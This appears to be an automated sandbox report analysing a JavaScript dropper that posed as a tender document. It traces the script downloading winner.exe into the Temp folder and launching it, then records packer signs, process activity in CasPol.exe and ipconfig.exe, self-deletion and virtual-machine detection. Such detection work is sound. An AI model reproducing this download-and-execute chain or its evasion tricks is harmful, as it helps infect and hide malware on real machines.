          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject%22");ITextStream.WriteLine(" entry:1742 f:_0x1f863f a0:507");ITextStream.WriteLine(" exit:1742 f:_0x1f863f r:%22ADODB.Stream%22");IHost.Name();ITextStream.WriteLine(" entry:1733 o:Windows%20Script%20Host f:CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:1733 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:1788 f:_0x406710 a0:489 a1:%22Lnop%22");ITextStream.WriteLine(" exit:1788 f:_0x406710 r:%22Open%22");_Stream._00000000();ITextStream.WriteLine(" entry:1784 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:1784 o: f:Open r:undefined");ITextStream.WriteLine(" entry:1798 f:_0x1f863f a0:490");ITextStream.WriteLine(" exit:1798 f:_0x1f863f r:%22Type%22");_Stream.Type("1");ITextStream.WriteLine(" entry:1811 f:_0x25fd55 a0:190 a1:%22xB*!%22");ITextStream.WriteLine(" exit:1811 f:_0x25fd55 r:%22n%40H!%22");ITextStream.WriteLine(" entry:1807 f:_0x406710 a0:510 a1:%22n%40H!%22");ITextStream.WriteLine(" exit:1807 f:_0x406710 r:%22Write%22");ITextStream.WriteLine(" entry:1820 f:_0x406710 a0:491 a1:%2255%5Ef%22");ITextStream.WriteLine(" exit:1820 f:_0x406710 r:%22ResponseBody%22");IServerXMLHTTPRequest2.responseBody();_Stream._00000000();ITextStream.WriteLine(" entry:1803 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:1803 o: f:Write r:undefined");ITextStream.WriteLine(" entry:1833 f:_0xfacb16 a0:201");ITextStream.WriteLine(" exit:1833 f:_0xfacb16 r:%22%26DC)%22");ITextStream.WriteLine(" entry:1829 f:_0x406710 a0:514 a1:%22%26DC)%22");ITextStream.WriteLine(" exit:1829 f:_0x406710 r:%22Position%22");_Stream.Position("0");ITextStream.WriteLine(" entry:1842 f:_0x1f863f a0:488");ITextStream.WriteLine(" exit:1842 f:_0x1f863f r:%22SaveToFile%22");_Stream._00000000();ITextStream.WriteLine(" entry:1838 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5Cwinner.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\winner.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:1838 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:1853 f:_0x1f863f a0:502");ITextStream.WriteLine(" exit:1853 f:_0x1f863f r:%22Close%22");_Stream._00000000();ITextStream.WriteLine(" entry:1849 o: f:Close");_Stream.Close();_Stream._00000000();ITextStream.WriteLine(" exit:1849 o: f:Close r:undefined");ITextStream.WriteLine(" entry:1864 f:_0x1f863f a0:506");ITextStream.WriteLine(" exit:1864 f:_0x1f863f r:%22Shell.Application%22");ITextStream.WriteLine(" entry:1873 f:_0x25fd55 a0:184 a1:%22o5HG%22");ITextStream.WriteLine(" exit:1873 f:_0x25fd55 r:%22%23zNv%22");ITextStream.WriteLine(" entry:1869 f:_0x406710 a0:520 a1:%22%23zNv%22");ITextStream.WriteLine(" exit:1869 f:_0x406710 r:%22ShellExecute%22");ITextStream.WriteLine(" entry:1882 f:_0x406710 a0:508 a1:%22Rtbv%22");ITextStream.WriteLine(" exit:1882 f:_0x406710 r:%22open%22")
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: winner[1].exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.cs.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: winner.exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.cs.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 1.0.winner.exe.260000.0.unpack, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.cs.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
          Potential obfuscated javascript found
          Source: 0900664 MOHS Tender..jsInitial file: High amount of function use 12
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004070E6 push es; retf 2_2_004070FA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004070FD push es; ret 2_2_00407121
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00411A25 push ebx; ret 2_2_00411A26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041137A push cs; retf 2_2_00411389
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00411500 push es; retf 2_2_00411501
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040F519 push ecx; iretd 2_2_0040F51C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00401DF0 push eax; ret 2_2_00401DF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041061D push es; iretd 2_2_0041061E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040D7F5 push ss; ret 2_2_0040D7F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00408FF6 push 0000002Dh; retf 2_2_00408FF8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0331D0D1 push ecx; ret 6_2_0331D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075E82A push es; iretd 6_2_0075E82B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_00757203 push 0000002Dh; retf 6_2_00757205
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075BA02 push ss; ret 6_2_0075BA03
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_007552F3 push es; retf 6_2_00755307
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075530A push es; ret 6_2_0075532E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075EBB1 push ds; iretd 6_2_0075EBBB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0075D726 push ecx; iretd 6_2_0075D729
          Source: winner[1].exe.0.drStatic PE information: 0xD8667C29 [Wed Jan 17 18:38:33 2085 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.955706486802807
          Source: initial sampleStatic PE information: section name: .text entropy: 7.955706486802807
          Source: winner[1].exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csHigh entropy of concatenated method names: '.cctor', 'l0dWZlv1b4IeI', 'S0c4ZhKCI', 'QdkbCQ9IO', 'HDnH3HI5u', 'Rsodxyse1', 'yldO0reJD', 't7VsNmSbu', 'GKECCuoHa', 'f9xlJUep9'
          Source: winner.exe.0.dr, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csHigh entropy of concatenated method names: '.cctor', 'l0dWZlv1b4IeI', 'S0c4ZhKCI', 'QdkbCQ9IO', 'HDnH3HI5u', 'Rsodxyse1', 'yldO0reJD', 't7VsNmSbu', 'GKECCuoHa', 'f9xlJUep9'
          Source: 1.0.winner.exe.260000.0.unpack, IuoHa1X9xJUep9RV2q/F0reJDjq7VNmSbudKE.csHigh entropy of concatenated method names: '.cctor', 'l0dWZlv1b4IeI', 'S0c4ZhKCI', 'QdkbCQ9IO', 'HDnH3HI5u', 'Rsodxyse1', 'yldO0reJD', 't7VsNmSbu', 'GKECCuoHa', 'f9xlJUep9'

          Persistence and Installation Behavior

          barindex
          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\winner.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\0900664 mohs tender..jsJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winner.exe TID: 5220Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 4988Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 352Thread sleep count: 42 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 352Thread sleep time: -84000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03395BA5 rdtsc 6_2_03395BA5
          Source: C:\Users\user\AppData\Local\Temp\winner.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_007631E0 FindFirstFileW,FindNextFileW,FindClose,6_2_007631E0
          Source: C:\Users\user\AppData\Local\Temp\winner.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000000.427299636.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.427299636.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.427299636.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.420383797.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.673513003.000000000EE2B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813008364.000000000EE2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.605240381.000000000EE2B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535002344.00000000065FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.532828824.000000000EE2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.585074615.000000000EE2B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.612040526.000000000EE2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.427299636.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.427299636.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03395BA5 rdtsc 6_2_03395BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01244120 mov eax, dword ptr fs:[00000030h]2_2_01244120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01244120 mov eax, dword ptr fs:[00000030h]2_2_01244120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01244120 mov eax, dword ptr fs:[00000030h]2_2_01244120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01244120 mov eax, dword ptr fs:[00000030h]2_2_01244120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01244120 mov ecx, dword ptr fs:[00000030h]2_2_01244120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C4F2E mov eax, dword ptr fs:[00000030h]6_2_032C4F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C4F2E mov eax, dword ptr fs:[00000030h]6_2_032C4F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FE730 mov eax, dword ptr fs:[00000030h]6_2_032FE730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FA70E mov eax, dword ptr fs:[00000030h]6_2_032FA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FA70E mov eax, dword ptr fs:[00000030h]6_2_032FA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0338131B mov eax, dword ptr fs:[00000030h]6_2_0338131B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335FF10 mov eax, dword ptr fs:[00000030h]6_2_0335FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335FF10 mov eax, dword ptr fs:[00000030h]6_2_0335FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0339070D mov eax, dword ptr fs:[00000030h]6_2_0339070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0339070D mov eax, dword ptr fs:[00000030h]6_2_0339070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EF716 mov eax, dword ptr fs:[00000030h]6_2_032EF716
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CDB60 mov ecx, dword ptr fs:[00000030h]6_2_032CDB60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DFF60 mov eax, dword ptr fs:[00000030h]6_2_032DFF60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03398F6A mov eax, dword ptr fs:[00000030h]6_2_03398F6A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F3B7A mov eax, dword ptr fs:[00000030h]6_2_032F3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F3B7A mov eax, dword ptr fs:[00000030h]6_2_032F3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03398B58 mov eax, dword ptr fs:[00000030h]6_2_03398B58
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CDB40 mov eax, dword ptr fs:[00000030h]6_2_032CDB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DEF40 mov eax, dword ptr fs:[00000030h]6_2_032DEF40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CF358 mov eax, dword ptr fs:[00000030h]6_2_032CF358
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03395BA5 mov eax, dword ptr fs:[00000030h]6_2_03395BA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03347794 mov eax, dword ptr fs:[00000030h]6_2_03347794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03347794 mov eax, dword ptr fs:[00000030h]6_2_03347794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03347794 mov eax, dword ptr fs:[00000030h]6_2_03347794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D1B8F mov eax, dword ptr fs:[00000030h]6_2_032D1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D1B8F mov eax, dword ptr fs:[00000030h]6_2_032D1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0338138A mov eax, dword ptr fs:[00000030h]6_2_0338138A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0337D380 mov ecx, dword ptr fs:[00000030h]6_2_0337D380
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D8794 mov eax, dword ptr fs:[00000030h]6_2_032D8794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FB390 mov eax, dword ptr fs:[00000030h]6_2_032FB390
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033037F5 mov eax, dword ptr fs:[00000030h]6_2_033037F5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0337FE3F mov eax, dword ptr fs:[00000030h]6_2_0337FE3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CE620 mov eax, dword ptr fs:[00000030h]6_2_032CE620
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D8A0A mov eax, dword ptr fs:[00000030h]6_2_032D8A0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CC600 mov eax, dword ptr fs:[00000030h]6_2_032CC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CC600 mov eax, dword ptr fs:[00000030h]6_2_032CC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032CC600 mov eax, dword ptr fs:[00000030h]6_2_032CC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E3A1C mov eax, dword ptr fs:[00000030h]6_2_032E3A1C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FA61C mov eax, dword ptr fs:[00000030h]6_2_032FA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FA61C mov eax, dword ptr fs:[00000030h]6_2_032FA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D766D mov eax, dword ptr fs:[00000030h]6_2_032D766D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0330927A mov eax, dword ptr fs:[00000030h]6_2_0330927A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0337B260 mov eax, dword ptr fs:[00000030h]6_2_0337B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0337B260 mov eax, dword ptr fs:[00000030h]6_2_0337B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03398A62 mov eax, dword ptr fs:[00000030h]6_2_03398A62
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EAE73 mov eax, dword ptr fs:[00000030h]6_2_032EAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EAE73 mov eax, dword ptr fs:[00000030h]6_2_032EAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EAE73 mov eax, dword ptr fs:[00000030h]6_2_032EAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EAE73 mov eax, dword ptr fs:[00000030h]6_2_032EAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032EAE73 mov eax, dword ptr fs:[00000030h]6_2_032EAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03354257 mov eax, dword ptr fs:[00000030h]6_2_03354257
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C9240 mov eax, dword ptr fs:[00000030h]6_2_032C9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C9240 mov eax, dword ptr fs:[00000030h]6_2_032C9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C9240 mov eax, dword ptr fs:[00000030h]6_2_032C9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C9240 mov eax, dword ptr fs:[00000030h]6_2_032C9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D7E41 mov eax, dword ptr fs:[00000030h]6_2_032D7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D7E41 mov eax, dword ptr fs:[00000030h]6_2_032D7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D7E41 mov eax, dword ptr fs:[00000030h]6_2_032D7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D7E41 mov eax, dword ptr fs:[00000030h]6_2_032D7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D7E41 mov eax, dword ptr fs:[00000030h]6_2_032D7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D7E41 mov eax, dword ptr fs:[00000030h]6_2_032D7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C52A5 mov eax, dword ptr fs:[00000030h]6_2_032C52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C52A5 mov eax, dword ptr fs:[00000030h]6_2_032C52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C52A5 mov eax, dword ptr fs:[00000030h]6_2_032C52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C52A5 mov eax, dword ptr fs:[00000030h]6_2_032C52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032C52A5 mov eax, dword ptr fs:[00000030h]6_2_032C52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_033446A7 mov eax, dword ptr fs:[00000030h]6_2_033446A7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03390EA5 mov eax, dword ptr fs:[00000030h]6_2_03390EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03390EA5 mov eax, dword ptr fs:[00000030h]6_2_03390EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03390EA5 mov eax, dword ptr fs:[00000030h]6_2_03390EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DAAB0 mov eax, dword ptr fs:[00000030h]6_2_032DAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032DAAB0 mov eax, dword ptr fs:[00000030h]6_2_032DAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FFAB0 mov eax, dword ptr fs:[00000030h]6_2_032FFAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0335FE87 mov eax, dword ptr fs:[00000030h]6_2_0335FE87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FD294 mov eax, dword ptr fs:[00000030h]6_2_032FD294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032FD294 mov eax, dword ptr fs:[00000030h]6_2_032FD294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F16E0 mov ecx, dword ptr fs:[00000030h]6_2_032F16E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D76E2 mov eax, dword ptr fs:[00000030h]6_2_032D76E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F36CC mov eax, dword ptr fs:[00000030h]6_2_032F36CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03398ED6 mov eax, dword ptr fs:[00000030h]6_2_03398ED6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0337FEC0 mov eax, dword ptr fs:[00000030h]6_2_0337FEC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03308EC7 mov eax, dword ptr fs:[00000030h]6_2_03308EC7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_0334A537 mov eax, dword ptr fs:[00000030h]6_2_0334A537
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_03398D34 mov eax, dword ptr fs:[00000030h]6_2_03398D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E4120 mov eax, dword ptr fs:[00000030h]6_2_032E4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E4120 mov eax, dword ptr fs:[00000030h]6_2_032E4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E4120 mov eax, dword ptr fs:[00000030h]6_2_032E4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E4120 mov eax, dword ptr fs:[00000030h]6_2_032E4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032E4120 mov ecx, dword ptr fs:[00000030h]6_2_032E4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F4D3B mov eax, dword ptr fs:[00000030h]6_2_032F4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F4D3B mov eax, dword ptr fs:[00000030h]6_2_032F4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F4D3B mov eax, dword ptr fs:[00000030h]6_2_032F4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F513A mov eax, dword ptr fs:[00000030h]6_2_032F513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032F513A mov eax, dword ptr fs:[00000030h]6_2_032F513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 6_2_032D3D34 mov eax, dword ptr fs:[00000030h]6_2_032D3D34
